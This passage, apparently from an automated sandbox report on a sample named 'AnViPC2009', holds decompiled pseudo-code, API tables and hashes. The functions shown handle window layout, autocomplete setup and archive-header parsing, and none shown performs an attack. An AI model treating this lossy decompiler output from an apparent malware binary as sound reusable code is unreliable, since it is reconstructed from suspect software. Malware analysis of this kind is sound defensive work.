                                                                                                                                                  							_push((_v56.right - _v56.left + 1) * _v16 / _t147);
                                                                                                                                                  							_t116 = (_v56.top - _v40.top - _t168) * _v12;
                                                                                                                                                  							asm("cdq");
                                                                                                                                                  							_push(_t116 / _t147);
                                                                                                                                                  							asm("cdq");
                                                                                                                                                  							_t123 = (_v56.left - (_t163 - _t116 % _t147 >> 1) - _v40.left) * _v16;
                                                                                                                                                  							_t150 = 0x64;
                                                                                                                                                  							asm("cdq");
                                                                                                                                                  							__eflags = _t123 % _t150;
                                                                                                                                                  							SetWindowPos(_a12, 0, _t123 / _t150, ??, ??, ??, ??);
                                                                                                                                                  						}
                                                                                                                                                  						_t98 = GetWindow(_a12, 2);
                                                                                                                                                  						_a12 = _t98;
                                                                                                                                                  						__eflags = _t98 - _v24;
                                                                                                                                                  						if(_t98 == _v24) {
                                                                                                                                                  							break;
                                                                                                                                                  						} else {
                                                                                                                                                  							_t87 =  &_a4;
                                                                                                                                                  							 *_t87 = _a4 + 1;
                                                                                                                                                  							__eflags =  *_t87;
                                                                                                                                                  							continue;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					return _t98;
                                                                                                                                                  				}
                                                                                                                                                  				if(_a12 != 0) {
                                                                                                                                                  					goto L5;
                                                                                                                                                  				}
                                                                                                                                                  				_push(0x206);
                                                                                                                                                  				asm("cdq");
                                                                                                                                                  				_t153 = 0x64;
                                                                                                                                                  				asm("cdq");
                                                                                                                                                  				SetWindowPos(_a4, 0, 0, 0, _v72.right * _v16 / _t153 + _t163, _t96 * _v12 / _t153 + _t167, ??);
                                                                                                                                                  				goto L3;
                                                                                                                                                  			}






















                                                                                                                                                  0x004096fe
                                                                                                                                                  0x0040970c
                                                                                                                                                  0x00409716
                                                                                                                                                  0x0040971f
                                                                                                                                                  0x0040972e
                                                                                                                                                  0x00409739
                                                                                                                                                  0x0040973a
                                                                                                                                                  0x0040973f
                                                                                                                                                  0x00409774
                                                                                                                                                  0x00409778
                                                                                                                                                  0x00409789
                                                                                                                                                  0x0040979f
                                                                                                                                                  0x004097ae
                                                                                                                                                  0x004097ae
                                                                                                                                                  0x004097b4
                                                                                                                                                  0x004097c1
                                                                                                                                                  0x004097c3
                                                                                                                                                  0x004097c9
                                                                                                                                                  0x004097cd
                                                                                                                                                  0x004097d0
                                                                                                                                                  0x004098aa
                                                                                                                                                  0x004097d8
                                                                                                                                                  0x004097df
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004097f4
                                                                                                                                                  0x004097fa
                                                                                                                                                  0x00409801
                                                                                                                                                  0x00409813
                                                                                                                                                  0x00409822
                                                                                                                                                  0x00409822
                                                                                                                                                  0x00409828
                                                                                                                                                  0x0040982c
                                                                                                                                                  0x00409835
                                                                                                                                                  0x0040983d
                                                                                                                                                  0x00409847
                                                                                                                                                  0x0040984a
                                                                                                                                                  0x0040984d
                                                                                                                                                  0x00409859
                                                                                                                                                  0x0040985c
                                                                                                                                                  0x00409865
                                                                                                                                                  0x00409869
                                                                                                                                                  0x0040986c
                                                                                                                                                  0x0040986f
                                                                                                                                                  0x00409880
                                                                                                                                                  0x00409884
                                                                                                                                                  0x00409885
                                                                                                                                                  0x00409886
                                                                                                                                                  0x0040988e
                                                                                                                                                  0x0040988e
                                                                                                                                                  0x00409899
                                                                                                                                                  0x0040989f
                                                                                                                                                  0x004098a2
                                                                                                                                                  0x004098a5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004098a7
                                                                                                                                                  0x004098a7
                                                                                                                                                  0x004098a7
                                                                                                                                                  0x004098a7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004098a7
                                                                                                                                                  0x004098a5
                                                                                                                                                  0x004098b6
                                                                                                                                                  0x004098b6
                                                                                                                                                  0x00409745
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040974b
                                                                                                                                                  0x00409750
                                                                                                                                                  0x00409753
                                                                                                                                                  0x00409760
                                                                                                                                                  0x0040976e
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetWindowRect.USER32 ref: 00409716
                                                                                                                                                  • GetClientRect.USER32 ref: 0040971F
                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000110,?,00000206,?,?,00000000), ref: 0040976E
                                                                                                                                                  • GetWindowTextA.USER32 ref: 00409789
                                                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 004097AE
                                                                                                                                                  • GetSystemMetrics.USER32 ref: 004097B6
                                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 004097C3
                                                                                                                                                  • GetWindowTextA.USER32 ref: 004097F4
                                                                                                                                                  • SetWindowTextA.USER32(00000000,00000000), ref: 00409822
                                                                                                                                                  • GetWindowRect.USER32 ref: 00409835
                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000110,00000200,00000110,00000200,00000204,?,?,00000000), ref: 0040988E
                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 00409899
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Text$Rect$ClientMetricsSystem
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3650388129-0
                                                                                                                                                  • Opcode ID: 8347b969ea2e7842fe4e0cd55c718392ddfeeb50cd3035ac2abe21e5bfc3b89a
                                                                                                                                                  • Instruction ID: 2c8379ae239d10ca57cd2180f3cddb418138291bf691b0d013c936aa1406a731
                                                                                                                                                  • Opcode Fuzzy Hash: 8347b969ea2e7842fe4e0cd55c718392ddfeeb50cd3035ac2abe21e5bfc3b89a
                                                                                                                                                  • Instruction Fuzzy Hash: F1512C72900209AFDF05DFA8DD49BEEBBB9EB48300F048066FA14E61A1D7B59E54CB54
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 959 40aad5-40aae3 call 406e67 962 40ab76-40ab77 959->962 963 40aae9-40aaf0 959->963 964 40aaf2-40aaf9 963->964 965 40ab2f-40ab42 GetClassNameA 963->965 964->962 966 40aafb-40ab08 GetModuleHandleA 964->966 967 40ab44-40ab57 lstrcmpiA 965->967 968 40ab68-40ab6a 965->968 973 40ab0a-40ab16 GetProcAddress 966->973 974 40ab1b-40ab2d 966->974 969 40ab67 967->969 970 40ab59-40ab65 FindWindowExA 967->970 971 40ab75 968->971 972 40ab6c-40ab6f SHAutoComplete 968->972 969->968 970->969 971->962 972->971 973->974 974->962 974->965
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040AAD5(signed int __ecx, void* __eflags, long _a4) {
                                                                                                                                                  				char _v84;
                                                                                                                                                  				intOrPtr _t6;
                                                                                                                                                  				long _t8;
                                                                                                                                                  				struct HINSTANCE__* _t10;
                                                                                                                                                  				signed int _t12;
                                                                                                                                                  				long _t15;
                                                                                                                                                  				CHAR* _t18;
                                                                                                                                                  
                                                                                                                                                  				_t12 = __ecx;
                                                                                                                                                  				_t6 = E00406E67();
                                                                                                                                                  				if(_t6 >= 5) {
                                                                                                                                                  					if( *0x41f314 != 0) {
                                                                                                                                                  						L6:
                                                                                                                                                  						_t15 = _a4;
                                                                                                                                                  						_t8 = GetClassNameA(_t15,  &_v84, 0x50);
                                                                                                                                                  						if(_t8 != 0) {
                                                                                                                                                  							_t18 = "EDIT";
                                                                                                                                                  							_t8 = lstrcmpiA( &_v84, _t18);
                                                                                                                                                  							if(_t8 != 0) {
                                                                                                                                                  								_t8 = FindWindowExA(_t15, 0, _t18, 0); // executed
                                                                                                                                                  								_t15 = _t8;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						if(_t15 != 0) {
                                                                                                                                                  							_t8 = SHAutoComplete(_t15, 0x10); // executed
                                                                                                                                                  						}
                                                                                                                                                  						return _t8;
                                                                                                                                                  					}
                                                                                                                                                  					if( *0x41f312 == 0) {
                                                                                                                                                  						_t10 = GetModuleHandleA("shlwapi.dll");
                                                                                                                                                  						if(_t10 != 0) {
                                                                                                                                                  							 *0x41f314 = GetProcAddress(_t10, "SHAutoComplete");
                                                                                                                                                  						}
                                                                                                                                                  						_t6 =  *0x41f314;
                                                                                                                                                  						 *0x41f312 = _t12 & 0xffffff00 | _t6 != 0x00000000;
                                                                                                                                                  						if(_t6 != 0) {
                                                                                                                                                  							goto L6;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t6;
                                                                                                                                                  			}










                                                                                                                                                  0x0040aad5
                                                                                                                                                  0x0040aadb
                                                                                                                                                  0x0040aae3
                                                                                                                                                  0x0040aaf0
                                                                                                                                                  0x0040ab2f
                                                                                                                                                  0x0040ab30
                                                                                                                                                  0x0040ab3a
                                                                                                                                                  0x0040ab42
                                                                                                                                                  0x0040ab45
                                                                                                                                                  0x0040ab4f
                                                                                                                                                  0x0040ab57
                                                                                                                                                  0x0040ab5f
                                                                                                                                                  0x0040ab65
                                                                                                                                                  0x0040ab65
                                                                                                                                                  0x0040ab67
                                                                                                                                                  0x0040ab6a
                                                                                                                                                  0x0040ab6f
                                                                                                                                                  0x0040ab6f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ab75
                                                                                                                                                  0x0040aaf9
                                                                                                                                                  0x0040ab00
                                                                                                                                                  0x0040ab08
                                                                                                                                                  0x0040ab16
                                                                                                                                                  0x0040ab16
                                                                                                                                                  0x0040ab1b
                                                                                                                                                  0x0040ab25
                                                                                                                                                  0x0040ab2d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ab2d
                                                                                                                                                  0x0040aaf9
                                                                                                                                                  0x0040ab77

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406E67: GetVersionExA.KERNEL32(?), ref: 00406E8B
                                                                                                                                                  • GetModuleHandleA.KERNEL32(shlwapi.dll), ref: 0040AB00
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040AB10
                                                                                                                                                  • GetClassNameA.USER32(?,?,00000050), ref: 0040AB3A
                                                                                                                                                  • lstrcmpiA.KERNEL32(?,EDIT,?), ref: 0040AB4F
                                                                                                                                                  • FindWindowExA.USER32 ref: 0040AB5F
                                                                                                                                                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 0040AB6F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressAutoClassCompleteFindHandleModuleNameProcVersionWindowlstrcmpi
                                                                                                                                                  • String ID: EDIT$SHAutoComplete$shlwapi.dll
                                                                                                                                                  • API String ID: 1963989359-1514112725
                                                                                                                                                  • Opcode ID: 7e0d619349da05086fca975bc4543e4d59b9c9950fa6a2fddf57d72a482bf5e1
                                                                                                                                                  • Instruction ID: 10eeb78ca3ae2ac3a2d6c46f0613fd210b7585f0e1121851411f370b487ba33d
                                                                                                                                                  • Opcode Fuzzy Hash: 7e0d619349da05086fca975bc4543e4d59b9c9950fa6a2fddf57d72a482bf5e1
                                                                                                                                                  • Instruction Fuzzy Hash: 09118271A013086AD7205B75AD49FEB3ABD9B45740F04803AEA00E22D0DBB8E565C77E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 975 401ca1-401cd4 call 401200 call 404fa3 call 408e85 982 401cd6-401ceb 975->982 983 401d2e-401d32 975->983 982->983 984 401ced 982->984 985 401d9f-401da4 call 408ced 983->985 986 401cf9-401d10 call 405651 984->986 987 401cef-401cf7 984->987 990 401da9-401dad 985->990 992 401d12-401d14 call 401b3c 986->992 994 401d34-401d42 986->994 987->983 987->986 990->992 993 401db3-401dfd call 408d9f call 408d7d call 408d9f * 2 990->993 999 401d19 992->999 1020 401e30-401e39 993->1020 1021 401dff-401e2b call 4098d0 call 40b282 call 40321d 993->1021 997 401d44-401d57 call 402c52 994->997 998 401d6f-401d9c call 402d79 994->998 997->998 1011 401d59-401d6a call 404ef5 call 4033ff 997->1011 998->985 1004 401d1d 999->1004 1008 401d27-401d29 1004->1008 1009 401d1f-401d22 call 40a1de 1004->1009 1013 4024c8-4024cc 1008->1013 1009->1008 1011->998 1023 401e3b-401e3d 1020->1023 1024 401e3f-401e42 1020->1024 1021->999 1028 401e50-401e7f call 408ced 1023->1028 1025 401e44-401e47 1024->1025 1026 401e49-401e4f 1024->1026 1025->1023 1025->1026 1026->1028 1033 401e85-401e86 1028->1033 1034 40235d-402396 call 408d9f call 408dde 1028->1034 1037 401f05-401f0e 1033->1037 1038 401e88-401e8b 1033->1038 1050 4023a7-4023cb call 408e5b 1034->1050 1055 402398-4023a2 call 408d7d 1034->1055 1041 401f10 1037->1041 1042 401f16-401fab call 408dde * 2 call 408d7d call 408dde * 2 call 408d7d * 2 call 408d9f call 408dde 1037->1042 1038->1037 1043 401e8d-401e8e 1038->1043 1041->1042 1116 401fc7-401fd9 1042->1116 1117 401fad-401fc5 call 408dde * 2 1042->1117 1046 401e90-401e98 1043->1046 1047 401ebf-401ed7 1043->1047 1046->1050 1051 401e9e-401eba call 408dde 1046->1051 1052 401ee8-401eeb 1047->1052 1053 401ed9-401ee3 call 408dde 1047->1053 1067 4023d1-4023ed 1050->1067 1068 40247d-402489 1050->1068 1051->1050 1052->1050 1054 401ef1-401f00 call 408d9f 1052->1054 1053->1052 1054->1050 1055->1050 1067->1068 1072 4023f3-4023f6 1067->1072 1069 4024b6-4024bc 1068->1069 1070 40248b 1068->1070 1078 4024c6 1069->1078 1079 4024be-4024c1 call 40a1de 1069->1079 1073 40249b-4024b4 call 4098d0 call 40b282 1070->1073 1074 40248d-402499 1070->1074 1076 402446-40245d call 4098d0 call 40b282 call 404ef5 1072->1076 1077 4023f8-4023ff 1072->1077 1100 402462-402478 call 40321d 1073->1100 1074->1069 1074->1073 1076->1100 1077->1076 1083 402401-402422 call 40a7c2 call 404fa3 call 4054b4 1077->1083 1078->1013 1079->1078 1108 402426-40242f call 405716 1083->1108 1100->1004 1114 402431 1108->1114 1115 402435-402436 1108->1115 1114->1115 1115->1108 1118 402438-402444 call 40a7e9 1115->1118 1121 401fe4-40203b call 401030 * 2 1116->1121 1122 401fdb-401fe2 1116->1122 1117->1121 1118->1068 1118->1076 1131 402040-402076 call 408e23 call 40dbc0 1121->1131 1132 40203d 1121->1132 1122->1121 1137 402103-402106 1131->1137 1138 40207c-402094 1131->1138 1132->1131 1139 40210c-402115 1137->1139 1140 4021ae-4021b7 1137->1140 1141 402096 1138->1141 1142 402099-40209b 1138->1142 1143 40211b-40213d call 403097 call 40a35d 1139->1143 1144 40219e-4021a0 1139->1144 1145 4021b9-4021c5 call 408e23 1140->1145 1146 4021ca-4021f7 call 40dfcd 1140->1146 1141->1142 1142->1140 1147 4020a1-4020cb call 4016c4 call 408e23 call 40a4c2 1142->1147 1168 40216c-402188 call 4030a8 1143->1168 1169 40213f-40216a call 40e2af call 40e1e9 CharToOemA 1143->1169 1148 4021a7-4021a9 call 401bfe 1144->1148 1145->1146 1159 4022d5-40230f call 408e5b 1146->1159 1160 4021fd-402230 call 408d9f 1146->1160 1147->1140 1178 4020d1-4020fe 1147->1178 1148->1140 1159->1050 1173 402315-40231c 1159->1173 1170 402237-40224c 1160->1170 1177 40218d-402191 1168->1177 1169->1177 1175 4022c4-4022cf 1170->1175 1176 40224e-402252 1170->1176 1179 40232b-40235b call 40321d call 40dc38 call 4098d0 call 40b282 1173->1179 1180 40231e-402326 call 40a5bb 1173->1180 1175->1159 1175->1170 1182 402254-40226a call 408dde call 40dfcd 1176->1182 1183 40226d-40227e 1176->1183 1177->1148 1184 402193-40219c 1177->1184 1178->1140 1179->1050 1180->1179 1182->1183 1190 402280 1183->1190 1191 402283-40228c 1183->1191 1184->1148 1190->1191 1195 4022b2-4022c1 1191->1195 1196 40228e-402293 1191->1196 1195->1175 1199 402295-4022b0 call 408d7d 1196->1199 1199->1195
                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                  			E00401CA1(void* __ecx, signed int __edx, void* __eflags) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				CHAR* _v16;
                                                                                                                                                  				signed int _v20;
                                                                                                                                                  				intOrPtr* _v24;
                                                                                                                                                  				signed char _v25;
                                                                                                                                                  				signed char _v26;
                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                  				signed int _v40;
                                                                                                                                                  				intOrPtr _v52;
                                                                                                                                                  				signed int _v56;
                                                                                                                                                  				char _v60;
                                                                                                                                                  				signed short _v64;
                                                                                                                                                  				signed char _v68;
                                                                                                                                                  				intOrPtr _v72;
                                                                                                                                                  				intOrPtr _v76;
                                                                                                                                                  				intOrPtr _v80;
                                                                                                                                                  				intOrPtr _v84;
                                                                                                                                                  				char _v88;
                                                                                                                                                  				char _v92;
                                                                                                                                                  				signed int _v104;
                                                                                                                                                  				char _v108;
                                                                                                                                                  				void _v128;
                                                                                                                                                  				char _v4224;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __ebp;
                                                                                                                                                  				intOrPtr _t269;
                                                                                                                                                  				signed int _t282;
                                                                                                                                                  				signed int _t284;
                                                                                                                                                  				signed int _t288;
                                                                                                                                                  				signed int _t294;
                                                                                                                                                  				signed int _t295;
                                                                                                                                                  				void* _t308;
                                                                                                                                                  				signed int _t309;
                                                                                                                                                  				signed int _t311;
                                                                                                                                                  				intOrPtr* _t315;
                                                                                                                                                  				signed int* _t335;
                                                                                                                                                  				signed short _t342;
                                                                                                                                                  				intOrPtr _t347;
                                                                                                                                                  				signed int _t358;
                                                                                                                                                  				intOrPtr _t359;
                                                                                                                                                  				void* _t361;
                                                                                                                                                  				signed char _t374;
                                                                                                                                                  				signed int _t375;
                                                                                                                                                  				signed int _t376;
                                                                                                                                                  				signed int _t382;
                                                                                                                                                  				void* _t394;
                                                                                                                                                  				signed int _t409;
                                                                                                                                                  				void* _t429;
                                                                                                                                                  				signed int _t432;
                                                                                                                                                  				void* _t440;
                                                                                                                                                  				signed short _t449;
                                                                                                                                                  				signed int _t452;
                                                                                                                                                  				signed int _t456;
                                                                                                                                                  				signed int _t465;
                                                                                                                                                  				signed int* _t475;
                                                                                                                                                  				signed int _t488;
                                                                                                                                                  				signed int _t490;
                                                                                                                                                  				signed int _t500;
                                                                                                                                                  				signed int _t514;
                                                                                                                                                  				signed int _t526;
                                                                                                                                                  				void* _t529;
                                                                                                                                                  				signed char* _t533;
                                                                                                                                                  				signed int* _t537;
                                                                                                                                                  				signed int _t539;
                                                                                                                                                  				void* _t541;
                                                                                                                                                  				signed int _t548;
                                                                                                                                                  				short* _t549;
                                                                                                                                                  				signed int _t552;
                                                                                                                                                  				signed short* _t555;
                                                                                                                                                  				signed int _t557;
                                                                                                                                                  				signed int _t559;
                                                                                                                                                  				intOrPtr* _t561;
                                                                                                                                                  				signed int _t563;
                                                                                                                                                  				signed int _t566;
                                                                                                                                                  				signed char* _t568;
                                                                                                                                                  				intOrPtr _t569;
                                                                                                                                                  				void* _t570;
                                                                                                                                                  				void* _t571;
                                                                                                                                                  				void* _t574;
                                                                                                                                                  				signed int _t578;
                                                                                                                                                  				signed int _t581;
                                                                                                                                                  
                                                                                                                                                  				_t526 = __edx;
                                                                                                                                                  				E00401200(0x107c);
                                                                                                                                                  				_t440 = __ecx; // executed
                                                                                                                                                  				_t269 = E00404FA3(__ecx, __edx); // executed
                                                                                                                                                  				 *((intOrPtr*)(__ecx + 0x6d78)) = _t269;
                                                                                                                                                  				 *(__ecx + 0x6d7c) = __edx;
                                                                                                                                                  				E00408E85( &_v56, __ecx);
                                                                                                                                                  				if( *((char*)(__ecx + 0x6d90)) == 0) {
                                                                                                                                                  					L10:
                                                                                                                                                  					_v5 = 0;
                                                                                                                                                  					L15:
                                                                                                                                                  					E00408CED(_t440,  &_v56, 7); // executed
                                                                                                                                                  					__eflags = _v40;
                                                                                                                                                  					if(_v40 == 0) {
                                                                                                                                                  						L5:
                                                                                                                                                  						E00401B3C(_t440, _t526);
                                                                                                                                                  						L6:
                                                                                                                                                  						_t581 = _v56;
                                                                                                                                                  						L7:
                                                                                                                                                  						if(_t581 != 0) {
                                                                                                                                                  							E0040A1DE(_v56);
                                                                                                                                                  						}
                                                                                                                                                  						return 0;
                                                                                                                                                  					}
                                                                                                                                                  					E00408D9F( &_v56, _t440 + 0x4680);
                                                                                                                                                  					E00408D7D( &_v56,  &_v26);
                                                                                                                                                  					_t533 = _t440 + 0x4688;
                                                                                                                                                  					 *(_t440 + 0x4684) = _v26 & 0x000000ff;
                                                                                                                                                  					E00408D9F( &_v56, _t533);
                                                                                                                                                  					_t555 = _t440 + 0x468a;
                                                                                                                                                  					E00408D9F( &_v56, _t555);
                                                                                                                                                  					_t449 =  *_t555 & 0x0000ffff;
                                                                                                                                                  					__eflags = _t449 - 7;
                                                                                                                                                  					if(_t449 >= 7) {
                                                                                                                                                  						_t282 =  *(_t440 + 0x4684);
                                                                                                                                                  						__eflags = _t282 - 0x75;
                                                                                                                                                  						if(_t282 != 0x75) {
                                                                                                                                                  							__eflags = _t282 - 0x73;
                                                                                                                                                  							if(_t282 != 0x73) {
                                                                                                                                                  								L22:
                                                                                                                                                  								_t284 = (_t449 & 0x0000ffff) - 7;
                                                                                                                                                  								__eflags = _t284;
                                                                                                                                                  								_push(_t284);
                                                                                                                                                  								L23:
                                                                                                                                                  								E00408CED(_t440,  &_v56);
                                                                                                                                                  								asm("cdq");
                                                                                                                                                  								asm("adc edx, [ebx+0x6d7c]");
                                                                                                                                                  								 *((intOrPtr*)(_t440 + 0x6d80)) = ( *_t555 & 0x0000ffff) +  *((intOrPtr*)(_t440 + 0x6d78));
                                                                                                                                                  								_t288 =  *(_t440 + 0x4684);
                                                                                                                                                  								_t452 = _t288 - 0x73;
                                                                                                                                                  								__eflags = _t452;
                                                                                                                                                  								 *(_t440 + 0x6d84) = _t526;
                                                                                                                                                  								if(_t452 == 0) {
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									E00408D9F( &_v56, _t440 + 0x4698);
                                                                                                                                                  									E00408DDE( &_v56, _t440 + 0x469c);
                                                                                                                                                  									__eflags =  *(_t440 + 0x4694) & 0x00000200;
                                                                                                                                                  									if(( *(_t440 + 0x4694) & 0x00000200) != 0) {
                                                                                                                                                  										E00408D7D( &_v56, _t440 + 0x46a0);
                                                                                                                                                  									}
                                                                                                                                                  									L76:
                                                                                                                                                  									_t294 = E00408E5B( &_v56, 0);
                                                                                                                                                  									__eflags = _v5;
                                                                                                                                                  									_t456 =  *(_t440 + 0x4684);
                                                                                                                                                  									_t295 =  !_t294;
                                                                                                                                                  									 *(_t440 + 0x6d9a) = _t295;
                                                                                                                                                  									 *(_t440 + 0x4678) = _t456;
                                                                                                                                                  									if(_v5 == 0) {
                                                                                                                                                  										L87:
                                                                                                                                                  										__eflags =  *(_t440 + 0x6d84) -  *((intOrPtr*)(_t440 + 0x6d7c));
                                                                                                                                                  										if(__eflags > 0) {
                                                                                                                                                  											L91:
                                                                                                                                                  											_t557 = _v40;
                                                                                                                                                  											__eflags = _v56;
                                                                                                                                                  											if(_v56 != 0) {
                                                                                                                                                  												E0040A1DE(_v56);
                                                                                                                                                  											}
                                                                                                                                                  											return _t557;
                                                                                                                                                  										}
                                                                                                                                                  										if(__eflags < 0) {
                                                                                                                                                  											L90:
                                                                                                                                                  											E0040B282(_t440 + 0x17, E004098D0(0x68), "???");
                                                                                                                                                  											L86:
                                                                                                                                                  											 *((char*)(_t440 + 0x6d98)) = 1;
                                                                                                                                                  											E0040321D(0x414c7c, 3);
                                                                                                                                                  											__eflags = _v56;
                                                                                                                                                  											goto L7;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags =  *((intOrPtr*)(_t440 + 0x6d80)) -  *((intOrPtr*)(_t440 + 0x6d78));
                                                                                                                                                  										if( *((intOrPtr*)(_t440 + 0x6d80)) >  *((intOrPtr*)(_t440 + 0x6d78))) {
                                                                                                                                                  											goto L91;
                                                                                                                                                  										}
                                                                                                                                                  										goto L90;
                                                                                                                                                  									}
                                                                                                                                                  									_t529 = _v52 - _v40 + 8;
                                                                                                                                                  									 *((intOrPtr*)(_t440 + 0x6d80)) =  *((intOrPtr*)(_t440 + 0x6d80)) + _t529;
                                                                                                                                                  									asm("adc [ebx+0x6d84], edi");
                                                                                                                                                  									__eflags =  *((intOrPtr*)(_t440 + 0x4680)) - _t295;
                                                                                                                                                  									if( *((intOrPtr*)(_t440 + 0x4680)) == _t295) {
                                                                                                                                                  										goto L87;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = _t456 - 0x7b;
                                                                                                                                                  									if(_t456 != 0x7b) {
                                                                                                                                                  										L85:
                                                                                                                                                  										E0040B282(_t440 + 0x17, E004098D0(0x70), _t440 + 0x17);
                                                                                                                                                  										E00404EF5(_t440);
                                                                                                                                                  										goto L86;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags =  *(_t440 + 0x5398) & 0x00000004;
                                                                                                                                                  									if(( *(_t440 + 0x5398) & 0x00000004) == 0) {
                                                                                                                                                  										goto L85;
                                                                                                                                                  									}
                                                                                                                                                  									E0040A7C2( &_v92, _t529, _t440);
                                                                                                                                                  									_t308 = E00404FA3(_t440, _t529);
                                                                                                                                                  									_push(0);
                                                                                                                                                  									_t559 = 7;
                                                                                                                                                  									_t309 = _t308 - _t559;
                                                                                                                                                  									__eflags = _t309;
                                                                                                                                                  									asm("sbb edx, edi");
                                                                                                                                                  									_push(_t529);
                                                                                                                                                  									_push(_t309);
                                                                                                                                                  									E004054B4(_t440);
                                                                                                                                                  									_v5 = 1;
                                                                                                                                                  									do {
                                                                                                                                                  										_t311 = E00405716(_t440);
                                                                                                                                                  										__eflags = _t311;
                                                                                                                                                  										if(_t311 != 0) {
                                                                                                                                                  											_v5 = 0;
                                                                                                                                                  										}
                                                                                                                                                  										_t559 = _t559 - 1;
                                                                                                                                                  										__eflags = _t559;
                                                                                                                                                  									} while (_t559 != 0);
                                                                                                                                                  									E0040A7E9( &_v92);
                                                                                                                                                  									__eflags = _v5;
                                                                                                                                                  									if(_v5 != 0) {
                                                                                                                                                  										goto L87;
                                                                                                                                                  									}
                                                                                                                                                  									goto L85;
                                                                                                                                                  								}
                                                                                                                                                  								_t465 = _t452 - 1;
                                                                                                                                                  								__eflags = _t465;
                                                                                                                                                  								if(_t465 == 0) {
                                                                                                                                                  									L33:
                                                                                                                                                  									__eflags = _t288 - 0x74;
                                                                                                                                                  									_t315 = _t440 + 0x46a8;
                                                                                                                                                  									if(_t288 != 0x74) {
                                                                                                                                                  										_t315 = _t440 + 0x53b8;
                                                                                                                                                  									}
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									_v24 = _t315;
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									_v64 = _t315 + 0xc;
                                                                                                                                                  									E00408DDE( &_v56, _t315 + 0xc);
                                                                                                                                                  									_t561 = _v24;
                                                                                                                                                  									_t66 = _t561 + 0x10; // 0x10
                                                                                                                                                  									_v20 = _t66;
                                                                                                                                                  									E00408DDE( &_v56, _t66);
                                                                                                                                                  									_t69 = _t561 + 0x14; // 0x14
                                                                                                                                                  									E00408D7D( &_v56, _t69);
                                                                                                                                                  									_t71 = _t561 + 0x18; // 0x18
                                                                                                                                                  									E00408DDE( &_v56, _t71);
                                                                                                                                                  									_t73 = _t561 + 0x1c; // 0x1c
                                                                                                                                                  									_v60 = _t73;
                                                                                                                                                  									E00408DDE( &_v56, _t73);
